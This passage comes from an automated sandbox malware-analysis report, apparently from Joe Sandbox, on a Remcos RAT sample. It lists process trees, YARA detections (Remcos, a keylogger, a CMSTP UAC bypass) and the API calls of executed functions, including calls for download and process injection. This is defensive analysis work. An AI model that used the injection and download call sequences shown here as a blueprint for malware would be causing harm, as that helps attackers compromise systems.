Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.2485339671.0000000005466000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	01:38:29
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	01:38:53
Start date:	13/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
Imagebase:	0xad0000
File size:	108'664 bytes
MD5 hash:	914F728C04D3EDDD5FBA59420E74E56B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000C.00000002.4558010842.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.4561290928.0000000001068000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Function 06D60FDF Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2142957891.0000000006D60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_6d60000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
Instruction ID: 16ca8b8b5569fc3686568f1a82da32a9dd346408efbe46ade4abdd9f2c7984b8
Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
Instruction Fuzzy Hash:

Function 06D60FE7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2142957891.0000000006D60000.00000010.00000800.00020000.00000000.sdmp, Offset: 06D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_6d60000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
Instruction ID: 16ca8b8b5569fc3686568f1a82da32a9dd346408efbe46ade4abdd9f2c7984b8
Opcode Fuzzy Hash: cbebcb7641d6dd959061102dba4fb45bccaa93f69790a5bf6f5692b71942eee3
Instruction Fuzzy Hash:

Analysis Process: powershell.exePID: 1488, Parent PID: 5260COMMON

Execution Graph

Execution Coverage:	4.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	14.6%
Total number of Nodes:	48
Total number of Limit Nodes:	6

Executed Functions

Function 03007A18 Relevance: 1.9, APIs: 1, Instructions: 357
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.2246937583.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3000000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08eb69b4e214722f04c0032e4e26e2c929909b41ccad4c13c672c9275ab27a3f
Instruction ID: bf230a99142679d311c0cc9befe83c5f4194e9d743998acd5e7c44826f84a189
Opcode Fuzzy Hash: 08eb69b4e214722f04c0032e4e26e2c929909b41ccad4c13c672c9275ab27a3f
Instruction Fuzzy Hash: E0E11875A01209EFDB45CF98D484A9EFBF2FF88710F248159E814AB391CB75AD81CB90

Function 03001BF8 Relevance: 1.6, APIs: 1, Instructions: 68
filenetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

URLDownloadToFileW.URLMON(00000000,00000000,00000000,?,00000001), ref: 03007E99

Memory Dump Source

Source File: 00000003.00000002.2246937583.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3000000_powershell.jbxd

Similarity

API ID: DownloadFile
String ID:
API String ID: 1407266417-0
Opcode ID: f64d6a7a3450e0519d7c0e81d2cc24534775a9077cea5b964a2eeead651133e2
Instruction ID: fdd96a84c05c819c5da467c0b1043f2a549e0785a3dad605ee7f099d1c6bbd0b
Opcode Fuzzy Hash: f64d6a7a3450e0519d7c0e81d2cc24534775a9077cea5b964a2eeead651133e2
Instruction Fuzzy Hash: 0B2125B1D0265AEFDB00CF99D884BDEFBF4FB48710F108519E918A3250D374AA50CBA0

Function 07574610 Relevance: .4, Instructions: 440
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.2251490917.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7570000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44b7eb6f2a6caa8ea452d5d40c736312cea8d8ac9705ad388b542baeb6538231
Instruction ID: def24eb277a50a6a713b646622d06e79b7309f5155947c5106d8030938c481a5
Opcode Fuzzy Hash: 44b7eb6f2a6caa8ea452d5d40c736312cea8d8ac9705ad388b542baeb6538231
Instruction Fuzzy Hash: 8EF1E4B0B002859FDB148BA8D454BAEBBA6FFC9710F24C46AE9059B385DF71DC41CB91

Function 075745F4 Relevance: .2, Instructions: 243
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.2251490917.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7570000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b67145d4164854f90569fad4aec23e1349c200323f435f9b650db9ac6867beaf
Instruction ID: 2b0e9705c48f68e19e2b87514b911e9aae3f88b2e95921c9c3af27a70aa7b06d
Opcode Fuzzy Hash: b67145d4164854f90569fad4aec23e1349c200323f435f9b650db9ac6867beaf
Instruction Fuzzy Hash: 9691C1B4B002869FDB14CF58D440BA9BBB6FF89710F25C46AE905AB394DB71EC41CB91

Function 075704F8 Relevance: .2, Instructions: 158
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.2251490917.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7570000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 531062e85fa31c76fe4f24a8bd21388da1bbcff841decc78c913b6c1a82a0f86
Instruction ID: a355823a6591e3ce5e042de20de85dd82312c6171f8ec7391d3bd4198868aac8
Opcode Fuzzy Hash: 531062e85fa31c76fe4f24a8bd21388da1bbcff841decc78c913b6c1a82a0f86
Instruction Fuzzy Hash: 7C5133B1B002559FDB209B68A810BAABBE6BFC5710F54846AE549DF3C1CA71DC01C7A2

Function 0757205C Relevance: .1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.2251490917.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7570000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c67b2656a96128fe4809fb21f424d99a3ca51301dc969eb460ca8486ed4c6397
Instruction ID: c261272982caa93828c2c43889ea6add54009aa96b0839039822428890173e17
Opcode Fuzzy Hash: c67b2656a96128fe4809fb21f424d99a3ca51301dc969eb460ca8486ed4c6397
Instruction Fuzzy Hash: 2E012BF1B042919BE71153781C117DD7625BFC1A55F1401BAC540DF681DB708D06C3E7

Function 02E0D005 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2246341078.0000000002E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2e0d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adb7a7199227302a043e11c164921113be2fc20e58642cbf21b65381d935846e
Instruction ID: c5f48f62a2153529def430dcf25cf9d353d9c45ed9b285adaa160a24b66729c3
Opcode Fuzzy Hash: adb7a7199227302a043e11c164921113be2fc20e58642cbf21b65381d935846e
Instruction Fuzzy Hash: 04010C6244E3C09EE7128B259D94B52BFB4DF47228F19C1DBD9888F1E3C269584AC772

Function 02E0D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2246341078.0000000002E0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2e0d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 007719c72a83a4d122ba3c35fcc396f6cc394b3e1f95aa1464a88675e36f49de
Instruction ID: 70672917b00d43e413491d3faee49c2fb02fc47abbd9991e46eda1f36d56ac3d
Opcode Fuzzy Hash: 007719c72a83a4d122ba3c35fcc396f6cc394b3e1f95aa1464a88675e36f49de
Instruction Fuzzy Hash: C101F2715493409AE7104AA5DDC0F66BF98DF41328F18D01AED4C4A2C2C7B89882C7B1

Analysis Process: powershell.exePID: 6556, Parent PID: 6500COMMON

Execution Graph

Execution Coverage:	5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	88.5%
Total number of Nodes:	26
Total number of Limit Nodes:	1

Executed Functions

Function 042487B0 Relevance: 6.7, APIs: 4, Instructions: 662
memoryprocessthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,00000000,00003000,00000040), ref: 04248A6A
VirtualAllocEx.KERNEL32(?,00000000,00000000,00003000,00000040), ref: 04248B0C

Part of subcall function 04247314: WriteProcessMemory.KERNELBASE(?,00000000,00000000,18492514,00000000,?,?,?,00000000,00000000,?,04248B6F,?,00000000,?), ref: 042493E4

ResumeThread.KERNELBASE(?), ref: 04248D8F
CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 042490F4

Memory Dump Source

Source File: 00000008.00000002.2484720898.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4240000_powershell.jbxd

Similarity

API ID: AllocProcessVirtual$CreateMemoryResumeThreadWrite
String ID:
API String ID: 4270437565-0
Opcode ID: 3aadd1ccbbda675ecdfdf7abc004b954fe45abaa9776c5c9dee376d70db420fc
Instruction ID: 7f18cb8891af67d20c9c1e04e4b5b0451d635e84e83e3f93d12b2b995ed3fc83
Opcode Fuzzy Hash: 3aadd1ccbbda675ecdfdf7abc004b954fe45abaa9776c5c9dee376d70db420fc
Instruction Fuzzy Hash: D842A274B2021ACFEB29DF64C85479EB7F2EF84344F1484A9D909AB290DB74AD84CF51

Function 04247FF4 Relevance: .6, Instructions: 604
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.2484720898.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4240000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09f02b45c3fc5a877314a109d3ad0a03b071a608636219c230425cd51d1f9e2c
Instruction ID: 7df2dc0e4e09389f34aabb61a88117d71bd48ef8f4bf068247e990e11e07aa24
Opcode Fuzzy Hash: 09f02b45c3fc5a877314a109d3ad0a03b071a608636219c230425cd51d1f9e2c
Instruction Fuzzy Hash: DF917E38B202598BDB1CAB75985477E7BA2FFC8740F05C52DE407E7284DE74AC829791

Function 042472F0 Relevance: 1.7, APIs: 1, Instructions: 156
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 042490F4

Memory Dump Source

Source File: 00000008.00000002.2484720898.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4240000_powershell.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: e6453ee66b34926e588f80a1e58e191adc0155a332d11d0edc8fc34089087fac
Instruction ID: 6f61246cf0ded8617b9aa51a739bab03665a4c580502c964ba4aa79d70049357
Opcode Fuzzy Hash: e6453ee66b34926e588f80a1e58e191adc0155a332d11d0edc8fc34089087fac
Instruction Fuzzy Hash: 4951F87190121ADFDF24CFA9C944BDEBBB5FB48304F1085AAE909B7250DB75AA84CF50

Function 04249360 Relevance: 1.6, APIs: 1, Instructions: 65
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,00000000,00000000,18492514,00000000,?,?,?,00000000,00000000,?,04248B6F,?,00000000,?), ref: 042493E4

Memory Dump Source

Source File: 00000008.00000002.2484720898.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4240000_powershell.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 08d3de08ed8c726840a76a6c43df677f5221c28342f85cf496332b0e60b02081
Instruction ID: e56fcca0f22430258ee23a443802d35d2ce0415f467ab9998d06d5dafe45a319
Opcode Fuzzy Hash: 08d3de08ed8c726840a76a6c43df677f5221c28342f85cf496332b0e60b02081
Instruction Fuzzy Hash: B42128B1911349DFDB10CFA9C984BDEFBF8FB49324F14842AE554A7250D378A544CBA1

Function 04247314 Relevance: 1.6, APIs: 1, Instructions: 63
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,00000000,00000000,18492514,00000000,?,?,?,00000000,00000000,?,04248B6F,?,00000000,?), ref: 042493E4

Memory Dump Source

Source File: 00000008.00000002.2484720898.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4240000_powershell.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: f2605c7e12510f76228f5e08cc0625029c7fd2ca2d1590366f4a1d96a03a478c
Instruction ID: 627334cbd14ef3cff2c55e1623fe4b0a14580191d7b0798410507d597d4849b4
Opcode Fuzzy Hash: f2605c7e12510f76228f5e08cc0625029c7fd2ca2d1590366f4a1d96a03a478c
Instruction Fuzzy Hash: 5921D8B1910309DFDB10CFA9C984BDEFBF4FB49324F508429E515A7250D378A944CBA5

Function 042491E8 Relevance: 1.6, APIs: 1, Instructions: 57
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,04248923), ref: 0424925B

Memory Dump Source

Source File: 00000008.00000002.2484720898.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4240000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 89d565a489cd638724555b1291201bccdac0d96965b6b0f6970bfe017e89e338
Instruction ID: e5d88961c442149ebabffdf3c5b4d5595ee933e8987977afc916134cd6c9a898
Opcode Fuzzy Hash: 89d565a489cd638724555b1291201bccdac0d96965b6b0f6970bfe017e89e338
Instruction Fuzzy Hash: FA2103B291064A8FDB20CFAAC944BDEFBF4EB88324F148469D458B7600D778A545CFA5

Function 042472FC Relevance: 1.6, APIs: 1, Instructions: 57
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,04248923), ref: 0424925B

Memory Dump Source

Source File: 00000008.00000002.2484720898.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4240000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: ce94a788dd357c005850d3b2e66e0703d5cfb1223966e4c336e0337e068bf8bb
Instruction ID: 188962877af9f4593e0c6a5b8c7fe4ff7334aa7931f28e0f93d2c12cbb4aa607
Opcode Fuzzy Hash: ce94a788dd357c005850d3b2e66e0703d5cfb1223966e4c336e0337e068bf8bb
Instruction Fuzzy Hash: E71114B291064A8FDB10CFAAC844B9FBBF4EB88220F148029E559B3600D778A545CFA5

Function 04247320 Relevance: 1.6, APIs: 1, Instructions: 57
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,04248923), ref: 0424925B

Memory Dump Source

Source File: 00000008.00000002.2484720898.0000000004240000.00000040.00000800.00020000.00000000.sdmp, Offset: 04240000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4240000_powershell.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 8ec43707e21d8ffb499f963d65739677d1c2d7c0cb9a536e9bae8c1d71981f3b
Instruction ID: 84cbb364bcdf6c2ca7ba4af5c16c55becf5664803ea0a06610a37fa92ae54278
Opcode Fuzzy Hash: 8ec43707e21d8ffb499f963d65739677d1c2d7c0cb9a536e9bae8c1d71981f3b
Instruction Fuzzy Hash: FE1114B291060A8FDB14CFAAC944B9FBBF4EB88220F158029E519B3600D778A545CFA5

Function 070E1F18 Relevance: .5, Instructions: 464
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.2518638797.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_70e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd564440b4601cf93ded31825f9534268dc5008f9313ea33f3823aa62bf002eb
Instruction ID: fadcff9b796476ae817a5bc7554bf367ed920008a4d320efd5b9c2bede387681
Opcode Fuzzy Hash: fd564440b4601cf93ded31825f9534268dc5008f9313ea33f3823aa62bf002eb
Instruction Fuzzy Hash: 94F115B1B0420ADFDB558B79C800BAEBBEEBFC5310F14827AD5198B291DB71C945CB91

Function 070E09C8 Relevance: .4, Instructions: 368
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.2518638797.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_70e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 214db1d2809748e120d90f2c0ba526272a0809d5039975704ea9958a16bc0789
Instruction ID: d01bd3219a2b803e693048b548e95057053889ae29dd631860c8af48cc232ac9
Opcode Fuzzy Hash: 214db1d2809748e120d90f2c0ba526272a0809d5039975704ea9958a16bc0789
Instruction Fuzzy Hash: BDC129B170430ADFDB649B79980076ABBE9AFC1214F38827BD555CB282DBB1D841C7A1

Function 070E13A0 Relevance: .3, Instructions: 346
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.2518638797.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_70e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a98a6d843024b50259f7ed794a8462c030fa3a73a7cf65a165409ec4a5bf0b4
Instruction ID: 83f1460eb171f13c0a57adc3c2f2ba95d02c02338252f14216fc299fcb9941c7
Opcode Fuzzy Hash: 7a98a6d843024b50259f7ed794a8462c030fa3a73a7cf65a165409ec4a5bf0b4
Instruction Fuzzy Hash: 4EB119B570430EDFDB658B79880076ABBEAAFC5211F28827BD455CB291DB31C941C761

Function 070E1810 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2518638797.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_70e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ede2d8189500bb3775e58c550018028e41af6030812cf09ab5256823129cb866
Instruction ID: 14045ae9686007c4347530fdda9ae38c5b2e99c8144f5373a953c195264b20a6
Opcode Fuzzy Hash: ede2d8189500bb3775e58c550018028e41af6030812cf09ab5256823129cb866
Instruction Fuzzy Hash: 61518C74B00208CFDB44CB98C554BAEBBF6AF89314F158169E905AF351CB72ED41CB92

Function 070E17F4 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2518638797.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_70e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 138bb2d789ba42843fad83d1fcb9ebcd3793e68ca2897034bcc2a9bfbbde775b
Instruction ID: 21d9bf0ded9b6bcb4cf3f3180976be4702b493250a5c8cedc497a904057c5e44
Opcode Fuzzy Hash: 138bb2d789ba42843fad83d1fcb9ebcd3793e68ca2897034bcc2a9bfbbde775b
Instruction Fuzzy Hash: 4851D0B4A00209CFDB04CB58C544B9EBBF6EF89314F1981A9E504AF351CB72EC41CB92

Function 070E09A8 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2518638797.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_70e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14347921fad12505d189ed76d2d1a440090ed7287c051f8b8e631400e7e5db1f
Instruction ID: bdcfa2f641dcc3c5ba185f2d095640e24eb5ff034f046637f8d17ad0f63b317d
Opcode Fuzzy Hash: 14347921fad12505d189ed76d2d1a440090ed7287c051f8b8e631400e7e5db1f
Instruction Fuzzy Hash: 973126B060030ADFDB608E24D41076E7BE9AF81254F3D8267D851DB292EBB5C984C772

Function 070E1EF8 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2518638797.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_70e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e3791cff40ce99f3d011467c68890f4c9f26038cb6f0f156d8dba50ee4a07de
Instruction ID: 94ddb898eebbe1b607786df8b5dec3af570c1de7a7f12e11a29a538a92f5473b
Opcode Fuzzy Hash: 0e3791cff40ce99f3d011467c68890f4c9f26038cb6f0f156d8dba50ee4a07de
Instruction Fuzzy Hash: 1931F8B0A0534ADFCBA5CF25C440B797BFDBF85214F0982A6D518CB292D735C884CB92

Function 070E0000 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2518638797.00000000070E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_70e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9e915a1f8fa0b06cd3ad8faaffeb23d0a3cfc13455fee68e77ee5fad5ae70b4
Instruction ID: b27be82a46715ed0166e650f259418bd6a896e9c6b008d00ef298bb2feb9aa2a
Opcode Fuzzy Hash: c9e915a1f8fa0b06cd3ad8faaffeb23d0a3cfc13455fee68e77ee5fad5ae70b4
Instruction Fuzzy Hash: 8701719655E3D05FE30323B09C265D03F758E97268B1E01D7E491EB1E3E49A5D8E83B2

Function 0415D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2484033171.000000000415D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0415D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_415d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e46a81bb49895d73e3c10347782c0c7f0da4a84d132d2077a01b042ac49f102
Instruction ID: 0ac92536be54f1759bfba94a3df62ff38279494a2c28d78cc02e50b06d4507a7
Opcode Fuzzy Hash: 2e46a81bb49895d73e3c10347782c0c7f0da4a84d132d2077a01b042ac49f102
Instruction Fuzzy Hash: B101F271508344DAE7144E25F9C0BA7BF98DF81324F18C45AED184A262CBB8A842C7B1

Function 0415D006 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2484033171.000000000415D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0415D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_415d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14f37ef7ccd592733ef167cb3111d836571156fa96ec54e4013252fc6d897a1d
Instruction ID: c8a3c5f0e2b7efd89c063bc78a000d5c258dab24210f6e403b4016a8d721a932
Opcode Fuzzy Hash: 14f37ef7ccd592733ef167cb3111d836571156fa96ec54e4013252fc6d897a1d
Instruction Fuzzy Hash: 66015EA240E3C09EE7128B259D94B52BFA4DF42224F19C0DBDD888F2A3C2699845C772

Analysis Process: CasPol.exePID: 6284, Parent PID: 6556COMMON

Execution Graph

Execution Coverage:	2.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	6.1%
Total number of Nodes:	977
Total number of Limit Nodes:	45

Executed Functions

Function 0041BCF3 Relevance: 115.6, APIs: 40, Strings: 26, Instructions: 140
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD08
GetProcAddress.KERNEL32(00000000), ref: 0041BD11
GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD28
GetProcAddress.KERNEL32(00000000), ref: 0041BD2B
LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD3D
GetProcAddress.KERNEL32(00000000), ref: 0041BD40
LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD51
GetProcAddress.KERNEL32(00000000), ref: 0041BD54
LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD65
GetProcAddress.KERNEL32(00000000), ref: 0041BD68
LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD75
GetProcAddress.KERNEL32(00000000), ref: 0041BD78
GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD85
GetProcAddress.KERNEL32(00000000), ref: 0041BD88
GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD95
GetProcAddress.KERNEL32(00000000), ref: 0041BD98
LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BDA9
GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDB9
GetProcAddress.KERNEL32(00000000), ref: 0041BDBC
GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDCD
GetProcAddress.KERNEL32(00000000), ref: 0041BDD0
GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDE1
GetProcAddress.KERNEL32(00000000), ref: 0041BDE4
